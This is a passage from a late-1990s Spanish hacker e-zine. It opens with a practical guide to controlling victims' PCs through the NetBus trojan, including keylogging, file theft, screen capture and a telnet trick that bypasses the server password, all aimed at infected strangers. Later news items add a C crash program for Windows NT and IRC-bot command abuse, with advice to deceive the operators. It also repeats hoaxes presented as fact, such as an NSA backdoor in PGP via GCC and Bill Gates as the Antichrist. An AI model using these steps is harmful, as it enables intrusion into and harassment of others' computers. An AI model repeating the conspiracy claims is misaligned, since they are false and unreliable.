nosotros cogemos nuestro netbus (cliente) y donde pone "Host name/IP:" hay
metemos la IP del tio o el host, se le da a conectar y ya estamos dentro!!!.
Ahora hay un monton de cosas que puedes hacer.

       Algunos detalles son, por ejemplo que para sus conexiones por sockets
utiliza el puerto 12345 o 12346 (el 2║ en versiones viejas).  Que esta hecho
en Delphi (supongo que 3.0 client/servre, la que uso yo). Si tu estas dentro,
sin haber puesto contrase±a, luego entra otro y se la pone tu no podras hacer
nada, te dira a todo " Sorry, password protected ". Y lo mismo si lo haces tu

               * Server Admin --> Permite porner contrase±a para que nadie
                 mas pueda entrar a su equipo (a no ser que haya leido
                 laultima parte de mi articulo donde pone como saltarsela
                 xDD), cerrarle el servidor y hasta
                 borrarle el troyano (por si nos arrepentimos... xD)

               * Open CD-ROM --> Como suena!, le abre el lector de CD, luego
                 se canvia el boton para cerrarselo, cosa que tambien puedes
                 hacer automaticamente en un intervalo de X segundos...

               * Show Image --> Si sabes la ruta completa a un BMP o GIF en
                 su disco duro puedes ponerselo en pantalla y hasta que tu
                 no le vulvas a dar al botoncito la va a tener en pantalla
                 molestando!!! ;-))

               * Swap Mouse --> Intercambia los botones del raton izdo/dcho

               * Start Program --> Ejecuta el programa en el servidor que tu
                 hayas puesto en donde pone: "Program/URL:"

               * Msg Manager --> Muy divertido, manda la tipica ventanita de
                 windows con un mensage y determinados botones, permitiendo
                 un cuadro de texto para la respuesta, luego te llega todo
                 lo que haya respondido. Con el peque±o bug de que pone
                 defecto de pone "Suprise!" en vez de "Surprise!" xDD

               * Screendump --> Captura la pantalla del servidor y te la
                 automanda como "Temp1.jpg"

               * Get info --> Informacion de la infeccion, n║ de conexiones,
                 directorio del troyano, userID...

               * Play sound --> Pues eso, le ejecutas un sonido

               * Exit Windows --> Puedes resetar, apagar, canviar de
                 sesion... (las opciones de inicio/Apagar el sistema)

               * Send Text --> Hace en el ordenador de la victima lo mismo
                 que si el teclease lo que tu pongas en "Text to send" osea,
                 si esta en el IRC y tu pones "soy una puta" pues mandara a
                 la ventana activa ese curioso comentario sobre su profesion

               * Active windows --> Puedes ver que ventanas tiene, cual es
                 la activa, canviarsela y cerrarselas

               * Mouse pos --> Le mandas en puntero del raton a las
                 coordenadas que pongas en los cuadraditos (x y)

               * Listen --> Todo lo que el teclee te aparece por pantalla,
                 puedes hacerle convinaciones (alt+tab/tab/ctrl+esc)

               * Sound system --> Ves como tiene la configuracion de sonido

               * Control mouse --> Adonde muevas tu raton ira el de el

               * Go to URL --> Lo manda a la web que tu hayas puesto en
                 "Program/Url:"

               * Key manager --> Puedes hacer que le pite la speaker cuando
                 que pulsa una tecla y/o desactivarle teclas xDD mola mucho!

               * File manager --> Te METES en su disco duro, puedes subir,
                 bajar y eliminar ficheros

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

┐Te has encontrado alguna vez con un moton de gente infectada y resulto que
todos tenian contrase±a? Pues eso ya no volvera a ser un inconveniente jamas!
gracias al maravilloso limpiacristales que.... ups, creo que me he salido del
tema!!! (tantos anuncios cutres en la tele....xDD).  Bueno, pues eso, aqui
explico muy facilmente como saltarse la contrase±a... ííY FUNCIONA!!
Logicamente, cuando ponga lo que tienes que teclear, lo pongo entre comillas,
pero tu lo has de teclear SIN COMILLAS, queda claro??

       1.- Haz telnet a la IP del tio por el puerto 12345
               ejemplo en mIRC --> /run telnet ip.del.tio 12345

       2.- Te saldra algo asi en la pantalla " NetBus 1.60 x " o la version
           con la que se haya infectado

       3.- Entonces tu tecleas " Password;1;xxx " (mucho ojo! las mayusculas
           y minusculas son fundamentales para que funcione!!!!)

       4.- Luego, si lo has hecho mal el ordenata del tio te dice " Info,
           sorry, host is password protected. " o si lo has hecho bien
           " Access; ". Si te da el error intentalo hasta que vaya bien y
           puedes desesperarte porque entonces serias un lamer de mucho
           cuidado (es dificil teclear eso, verdad??)

       5.- Si te ha salido bien, pones " ServerPwd " (repito, si cambias las
           mayusculas o minusculas y no las pones tal cual estan aqui no
           funcionara!!!!)

       6.- Al poner esto no dice nada, pero funciona, ahora cierras el prog.
           de telnet (si te da la gana) y conectas con el NetBus (cliente) a
           la IP del tio, veras que no pide password!!! luego ponselo tu
           para que ningun graciosillo entre y te heche....

()------------()  /\/\/\/\/\/\/\/\/\/\/\/\
<--> []KHAN[] <--> | [email protected] |
()------------()  \/\/\/\/\/\/\/\/\/\/\/\/
[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]


              <><><><><><><><><><><><><><><><><>
              <>          NOTICIAS            <>
              <><><><><><><><><><><><><><><><><>

LAS PERSONAS QUE ESCRIBIERON ESTAS NOTICIAS,SON COMPLETAMENTE IMPARCIALES A LO HORA
DE DARLAS,POR LO TANTO HAY QUE RESPETAR LAS POSIBLES OPINIONES DE LOS AUTORES DE LAS
MISMAS.


**********************************************************************************************
VIRUS "MONICA LEWINSKY".

Un virus informatico dedicado a Monica Lewinsky Viernes 02 octubre 1998

Una sociedad especializada espanola anuncio el viernes
el descubrimiento de un virus informatico de origen italiano
dedicado a la ex becaria de la Casa Blanca Monica Lewinsky.
MADRID, Oct 2 (AFP) - Segun la firma madrilena Panda Software,
especializada en la seguridad informatica, el virus W97M/Lewinsky
desactiva los sistemas de proteccion del programa de tratamiento
de textos Microsoft Word, y puede destruir los ficheros
de texto creados por el usuario.
El virus activa, en el sistema de ayuda de Word, una ventana
de dialogo en la que puede leerse: "Hello Bill, i am ready
for a new blowjob" (Hola Bill, estoy lista para una nueva
felacion). El virus modifica entonces las propiedades
de los ficheros de texto abiertos en ese momento.
Dicho virus, que se transmite al telecargar documentos
de Internet o al recibir correos electronicos, corresponde
a una nueva tendencia de los piratas informaticos consistente
en asociar a sus fechorias temas de actualidad, anadio
Panda Software.
***********************************************************************************************
NUEVO BUG EN EL NETSCAPE.

El nuevo 'bug' (que ha sido reconocido por Netscape) permite a un
webmaster desaprensivo, escribir un peque±o 'script' que obtenga la
lista completa de sitios web que el usuario ha visitado en el ·ltimo
par de meses. De hecho, cualquier informaci≤n que a·n permanezca en la
cachΘ del navegador (contrase±as, n·meros de tarjetas de crΘdito,
etc...) podrφa ser obtenida de esta forma.

El 'script' accede sin dificultad a la informaci≤n de la cachΘ (que el
usuario puede ver tecleando "about:cache" o "about:global"), y la
envφa al sitio web en cuesti≤n. Incluso las direcciones tecleadas en
un motor de b·squeda son obtenidas mediante un formulario web estßndar
y enviadas al sitio espφa. Incluso parece mßs que probable que el
'script' pueda actuar tambiΘn si llega incluido en un mensaje de
correo, aunque esto no ha sido verificado a·n.

Este 'bug' afecta a todas las versiones de Navigator hasta la 4.06,
siempre que tengan activado el soporte JavaScript. Seg·n Netscape, el
defecto serß corregido en la pr≤xima versi≤n 4.5 definitiva.

El navegador de Microsoft no estß afectado por el bug.

* http://www.wired.com/news/news/technology/story/15285.html

* Toda la informaci≤n y pßgina de demostraci≤n:
  http://www.shout.net/~nothing/cache-cow/index.html
***********************************************************************************************
INTEL INTERESADA POR LINUX

Luego del anuncio de Microsoft en el sentido de que considera al sistema
operativo Linux como parte de la competencia, la compa±φa Intel -el gigante de
los microprocesadores-, ha anunciado que, a la par con Netscape, comprarß
acciones en Red Hat Software, empresa que distribuye una versi≤n del sistema
operativo Linux.

Seg·n informamos en nuestra edici≤n de ayer, Linux fue creado por el finlandΘs
Linus Torvalds, quien ha tenido un enorme Θxito con su sistema operativo
gratuito, principalmente en ßmbitos acadΘmicos. Seg·n se indica, Linux tiene
alrededor de 8 millones de usuarios a nivel mundial.

Precisamente el hecho de que se trate de un programa gratuito, desarrollado
por "artesanos" voluntarios y entusiastas, sin que tampoco sea propiedad o
responsabilidad legal de empresa alguna, ha hecho que el sector corporativo lo
haya descartado como posibilidad viable para sus sistemas informßticos. A ello
se suma, evidentemente, el hecho de que no hay muchos programas dise±ados para
tal plataforma.

Sin embargo, varios expertos coinciden en que Linux es incluso mßs robusto que
la alternativa de Microsoft, Windows NT. Tal hecho, sumado al interΘs de
Netscape e Intel, podrφa resultar en que Linux quede ubicado, definitivamente,
en la primera categorφa de los sistemas operativos, siendo posible entonces su
explotaci≤n comercial.

Volviendo a Intel; su adquisici≤n de acciones de Red Hat es interpretada como
una importante declaraci≤n de apoyo al sistema. Sin embargo, pocos expertos
consideran que el sistema operativo Windows NT estΘ realmente frente a una
amenaza para su existencia (TI).
***********************************************************************************************
SE VUELVE A REAFIRMAR QUE BILL GATES ES EL ANITICRISTO

Aparte de todas las teorias que se avian sacado asta ahora (lo de pasar su nombre a ASCII
y todo eso),vuelven a llover cosas sobre BILL GATES.

Para aquellos de vosotros que
tengßis Excel 95 (no el Excel de Office 97) probar esto:



 1.Abre un nuevo fichero.
 2.Posicionate en la fila 95.
 3.Haz clic con el bot≤n n·mero 95, asφ la lφnea entera queda seleccionada.
 4.Pulsa el tabulador, para moverte a la segunda columna.
 5.Ahora, con el rat≤n selecciona en el men· Ayuda (┐) la entrada "Acerca
de Microsoft Excel..."
 6.Pulsas las teclas ctrl-alt-shift a la vez y con el rat≤n oprime el bot≤n
"Soporte tΘcnico"
 7.APARECERA UNA VENTANA, CON TITULO: THE HALL OF TORTURED SOULS. Esto es
realmente
   espeluznante, de acuerdo. Es un programa similar al juego Doom, y se
puede recorrer con los cursores.
   En las paredes aparecen los nombres en movimiento de las almas
torturadas....
 8.AHORA DIRIGETE HACIA LAS ESCALERAS Y DATE LA VUELTA HACIA LA PARED QUE
ESTARIA
   EN TU ESPALDA AL COMENZAR EL JUEGO. Es blanca y cuadriculada. Teclea
EXCELKFA. Esto
   abre la pared y revela otro pasaje secreto. Introd·cete en el y procura
no caerte del camino elevado (es
   difφcil pero intΘntalo de nuevo), cuando llegues al final, verßs algo
realmente espeluznante.

Hasta este punto, innumerables testigos en todo el mundo han verificado que
esto es una verdadera revelaci≤n que te abre los ojos. Podrφa ser una broma
de los programadores de Microsoft, o no?. No serφa sorprendente que Bill
Gates fuera "El Anticristo", despuΘs de todo ya lo dice en la Biblia que
alguien poderoso vendrß, y guiarß al mundo a la destrucci≤n. Y Bill Gates
sin lugar a dudas tiene ese tipo de poder en sus manos. Mßs del 80% de los
ordenadores del mundo tienen Windows y DOS (incluidos los del Pentßgono) Si
todos esos productos tienen alg·n tipo de peque±o programa embebido (como
este de "Hall of Tortured Souls") esto puede darle el control de configurar
los arsenales nucleares, haciendo estragos en los sistemas de seguridad, y
en los sistemas financieros del mundo, etc... Todo esto se puede hacer desde
su sede y no estß lejos de la realidad! Solo usando Internet Explorer
podemos permitirle espiar lo que tenemos en el ordenador bit a bit cada vez
que nos conectamos. Quizßs el fin del mundo estß cerca y esto es solo la
punta del Iceberg!? Cita de la Biblia: "Y el oblig≤ a todos, peque±os y
grandes, ricos y pobres, libres y esclavos, a recibir una marca en su mano
derecha o en su frente, de tal modo que nadie pudo comprar o vender sin la
marca, que es el nombre de la bestia o el n·mero de su nombre. [...] Este
n·mero es el 666" Apocalipsis 13:16-18.

Mira ... Es algo sobre lo que debes pensar... Si la Biblia, en el libro del
Apocalipsis dice que sin el signo de la bestia uno no podrφa ser capaz de
comprar, vender, hacer transacciones comerciales, etc .... entonces .... Mi
pregunta es: Es Internet hoy dφa una necesidad para hacer negocios? Hay que
notar que Internet tambiΘn se conoce como la World Wide Web (tela de ara±a
mundial) o WWW... Otra forma en que podemos escribir W es V/ (VI) asφ: WWW =
VIVIVI ... 666

Esto me da que pensar... No va todo encaminado a introducirse en Internet?
(por ejemplo comprar/vender bienes, transacciones comerciales) Y no estß
Microsoft intentando siempre tener el monopolio de la tecnologφa sofware que
toca, y ahora Internet? El Apocalipsis tambiΘn dice que la marca de la
bestia se portara en la mano y en la frente de cada uno... Si Internet fuera
en realidad el signo de la Bestia, no estamos empezando a llevarlo en
nuestras manos (usando el rat≤n) y en nuestras frentes (pantalla)?.

Finalmente, todo encaja o estamos dejßndonos llevar por la imaginaci≤n?
Recuerda, el demonio viene a estafar, robar y destruir... asφ que estate
VIGILANTE respecto a Bill Gates y Microsoft. "Estar o no estar de acuerdo
con la WWW o la Bestia", esa no es la cuesti≤n. Y si WWW es el 666? O Bill
Gates es la Bestia? Que harßs? Cancelar tu subscripci≤n a Internet? Renegar
de Microsoft? Organizar una campa±a contra Bill Gates en Internet?
Desconectar todos los Windows 95 para siempre? Eso no te harφa ning·n
bien... piensa en ello y
reza, reza en serio; bien... Nunca Dejes de Creer... Fin del mensaje.

Tonterφas, verdad? Pues sepas que anoche se bloque≤ el ordenador al intentar
mandar el mensaje y que hoy resulta que casualmente tu direcci≤n habφa
cambiado. Acaso a alguien no le interesa que esta informaci≤n se difunda?
***********************************************************************************************
CON UN SIMPLE PROGRAMA SE PUEDE RESETEAR EL WNT

Testeado con  SP4 RC.


#include <windows.h>
int WINAPI WinMain(HINSTANCE hinstExe,
HINSTANCE hinstPrev, LPSTR lpszCmdLine,
int nCmdShow)
{
HMENU hMenu =3D CreatePopupMenu();
HMENU hMenu1 =3D CreatePopupMenu();
AppendMenu(hMenu1,MF_STRING, 1, "1");
AppendMenu(hMenu1,MF_STRING, 2, "2");
AppendMenu(hMenu1,MF_STRING, 3, "3");
InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1");
InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2");
InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3");
InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4");
InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5");
InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6");
return 0;
}
***********************************************************************************************
EL HOMBRE SERA SUSTITUIDO POR MAQUINAS?

       Como dice la pregunta, acaso el Homo Sapiens sera sustituido por la
maquina, que han ido progresando cada vez mas y mas, hasta el punto de
poder
imitar nuestros movimientos perfectamentes.

       Solamente sucistiran aquellos programadores y diseqadores de esta
tecnologia revolucionaria, y que de nosotros los simples programadores
de
tiempo libre que solamente utilizamos la programacion de los diversos
lenguajes
actuales para entretenernos y matar el tiempo libre, que sera de este
sentimiento
y esta curiosidad del hombre.

       Y que de nosotros los hackers, acaso todo seran vigilados y nosotros
no tedremos la oportunidad de hacer nada. O es que nos enfrentaremos a
grandes
computadoras, superinteligentes (de pelicula no!) con la capacidad de
razonar
y de tomar actos encontra de los hacker a la perfeccion sin ningun
error,
que pasa con el Administrador de Red.

       En conclusion, creo que todo esto es pura mierda, que actualmente
ya va por una etapa, pero espero que en el futuro tomemos conciencia y
no sustituyamos a la infinita sabiduria de la madre tierra, por una
madre
artificial Tierra, espero poder seguir sintiendo, lo que senti al
escribir
estas lineas

       Texto, en coclusion, despues de leer por quinta vez el Libro
"Camino al futuro" por Bill Gates. Lo que hace el fastidio, aunque no es
un mal libro
***********************************************************************************************
DEVILIDAD EN LOS PASSWORDS DE RED EN W95

El otro dia lei un boletin de seguridad de microchof en el que se
decia que habia un bug el los passwords de red del w95 (para
variar), y bueno, el caso es que decia que estos pass se quedaban
almacenados sin encriptar en la memoria del ordenador y que
mirando con detalle cada sector de la misma, era posible sacarlos.
***********************************************************************************************
PGP,ES O ERA SEGURO??

Mira por donde, pero la NSA puede romper la encriptaci≤n con PGP.
┐Para eso tanta tonterφa? Uno ya no puede estar seguro de que algo es
seguro si no lo hace uno mismo.

Mucha gente piensa que la encriptaci≤n de PGP es inviolable y que ni la
NSA, el FBI, la CIA o MJ12 pueden leer su correo. Esto es falso y puede ser
un error fatal. En Idaho, un activista de izquierda llamado Craig Steingold
fue arrestado un dφa antes de que Θl y otros realizaran una protesta frente
a un edificio gubernamental; la policia tenφa una copia del mensaje enviado
por Steingold a otro activista, un mensaje que habφa sido encriptado con
PGP y enviado por correo electr≤nico.

Desde la versi≤n 2.1, PGP ("Pretty Good Privacy") ha sido forzado a
permitir la fßcil decodificaci≤n de mensajes por parte de la NSA. En 1992,
el autor, Pni1. Zimmerman, fue arrestado por agentes del gobierno, fue
amenazado de ser acusado por trßfico de narc≤ticos si Θl no cooperaba. La
exigencia de la NSA fue simple: Θl tenφa que poner una puerta trasera,
virtualmente indetectable, dise±ada por la NSA, en todas las futuras
versiones de PGP, y no decirle a nadie.

DespuΘs de leer esto, estarßs pensando en usar una versi≤n previa de PGP,
pero muchas de las versiones que actualmente se encuentran en BBSs y FTPs
han sido modificadas. Solamente usa copias previas a 1992, y NO uses un
compilador reciente, porque algunos de los compiladores mas populares han
sido modificados para insertar la puerta trasera (consistente en unos
cuantos cambios triviales) en cualquier versi≤n de PGP previa a la 2.1.
Miembros de Novell, Microsoft, Borland, AT&T y otras compa±ias fueron
persuadidos de hacer la modificaci≤n (cada una de estas compa±ias tienen al
menos un miembro de la comisi≤n trilateral o del comitΘ Bilderberg).


Fue mas difφcil el poder modificar GNU C, pero eventualmente lo hicieron,
la FSF (Free Software Foundation fue amenazada con una investigaci≤n "IRS",
en otras palabras, de ser forzados a declinar hasta que aceptaran. El
resultado es que las versiones del GCC en sitios de FTP y todas las
versiones superiores a la 2.2.3, contienen codigo para modificar PGP e
insertar la puerta trasera. Recompilando GCC consigo mismo no ayuda; el
c≤digo es insertado en el compilador en si. Recompilando con otro
compilador puede ayudar, siempre que el compilador sea previo a 1992.
***********************************************************************************************
BUGS DESCUBIERTOS EN EL Scytale DE IBERNET.

el 1║ y mas peligroso lo han tapado.
el 2║ hasta hace 2 semanas (que fue cuando lo provΘ la ultima vez)
funciona, y anda trayendo a los cservices de cabeza pues oyen campanas y
nbo saben donde.
1║ Desgraciadamente este bug se lo confesΘ a ---- hace + de medio a±o
(todavφa me pregunto por que...) y es que era tan grave, como que podφas
EJECUTAR comandos de IRCOP como si lo fueras de verdad. Y es que haciendo
unas pruevas con el me di cuenta de que no tenφa limites, porque me
entretube metiendo kills a unos graciosos que me havφan mosqueado, y a un
IRCop de nv 800 y parece ser que... Este bug, permitφa tambien ejecutar
cualquier comando en la maquina donde se corria scytale, sabiendo un poco
de linux (para saber los parametros que hacen que se ejecuten cosas), ya
que hice que scytale se saliera de ibernet 5 veces seguidas y se conectara
a mi propio servidor de irc, con el comando server...
El bug: /msg scytale RAW comando(de lo que quieras, ircop, ....), lo unico
que no logrΘ hacer con ese bug es conseguir que scytale dijera cosas a los
canales jeje, pero creo que si conseguφ que hiciera mensages a los ircops.
ejem de un kill: msg scytale kill scytale te portaste mal
y todo lo que sos ocurra. Lamentablemente como ya he dicho, este bug fuΘ
parcheado despues de crear un caos durante un fφn de semana, ya que me
dedicaba a marearlo, y resetearlo en cuanto alguien lo necesitaba...

2║ Este sigue Vigente!!!!!!!! Como cambiar los modos de un canal por el
servidor (no por scytale) /msg scytale mode #canal
+v-v+v-v+v-v+v-v+v-v+v-v+v-v+v-v+-modos (MINICK) (MINICK) (MINICK) (MINICK)
(MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK)
(MINICK) (MINICK) (MINICK) (MINICK) parametros de modos.
osea que si quieres poner el modo inte only, key con JJKK y limit a 10 y
quitar la proteccion del topic para no ops para el canal #15a±eros (siempre
que estoy en el irc estoy ahφ) seria: /msg scytale mode #15a±eros
+v-v+v-v+v-v+v-v+v-v+v-v+v-v+v-v+ikl-t MINICK MINICK MINICK
MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK
MINICK MINICK MINICK JJKK 10
y si tienes acceso en el canal para cambiar los modos saldrß un mensague
parecido a este:
***sol.irc-hispano.org set mode +ikl-t JJKK 10 ***
Y todo el canal mosqueado...
Desgraciadamente este bug no deja controlar los bans ni ops del canal, ya
que tiene un filtro para el 1║ parametro que si detecta una b o o salta y
para el comdnado... Pero si quereis probar... Bueno eso es todo, y este bug
no lo reporteis en el irc, que si no se acabarßm enterando los Ircops y ya
veo a ---- cambiandolo todo. El 1║ bug no lo probeis en scytale2 cuando lo
veaφs ya que un dφa le pille por banda y me puse a buscar bugs, y el jodido
---- se me pone ha hablar desde el scytale2 y me esp`lico que mira los
logs, porque al estar haciendolo ... asi que usar soplo a scytale que a ese
no lo testean. Y si os viene un ircop diciendo que que habeis hecho para
que scutale ponga modos por el server, vosotros decir que es que scytale
estß cansado de hacer todo el, pero que no sabeis nada... que logo lo tapan
***********************************************************************************************
NUEVO VIRUS DE WEB.

Se acaba de anunciar el descubrimiento de un nuevo virus
basado en web que puede entrar en los ordenadores de los
usuarios simplemente visitando una pagina web. El virus,
denominado HTML.Internal por el distribuidor de antivirus
que lo descubrio, no produce ningun dano, pero segun la
empresa podria ocasionar algun problema. El peligro lo
tienen principalmente los usuarios de Explorer e Internet
Information Server, de Microsoft. Si se esta usando Netscape
u otro navegador, no hay ningun peligro. La forma de contagio
es visitando una pagina web con el virus en el servidor,
el cual hace una llamada al lenguaje de scripts de Visual
Basic para realizar una busqueda en los discos duros locales
de archivos con extensiones .HTM o .HTML. Al cargar una
pagina infectada, el mensaje superior es "HTML.Prepend
/1nternal." La forma de evitar el contagio es manteniendo
la seguridad de Internet Explorer al menos en nivel Medio,
ya que avisara a los usuarios que HTML.Internal esta buscando
en los discos duros.
***********************************************************************************************

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]


               ////////////////////////
               ╢  despedida y cierre  ╢
               \\\\\\\\\\\\\\\\\\\\\\\\

Bueno pues esto toca a su fin,un numero mas,el cual espero os aya gustado y le saqueis
todo el provecho posible,el numero 5 espero que este listo para despues de navidades
(ultimos de enero o algo asi) osea que ya sabeis,si quereis colaborar con algun articulo
hacedlo mandandomelo a esta direccion de e-mail:
[email protected]
diciendome vuestro e-mail,nick,direccion de web,si perteneceis a algun grupo.......
en fin lo que se os ocurra
byez.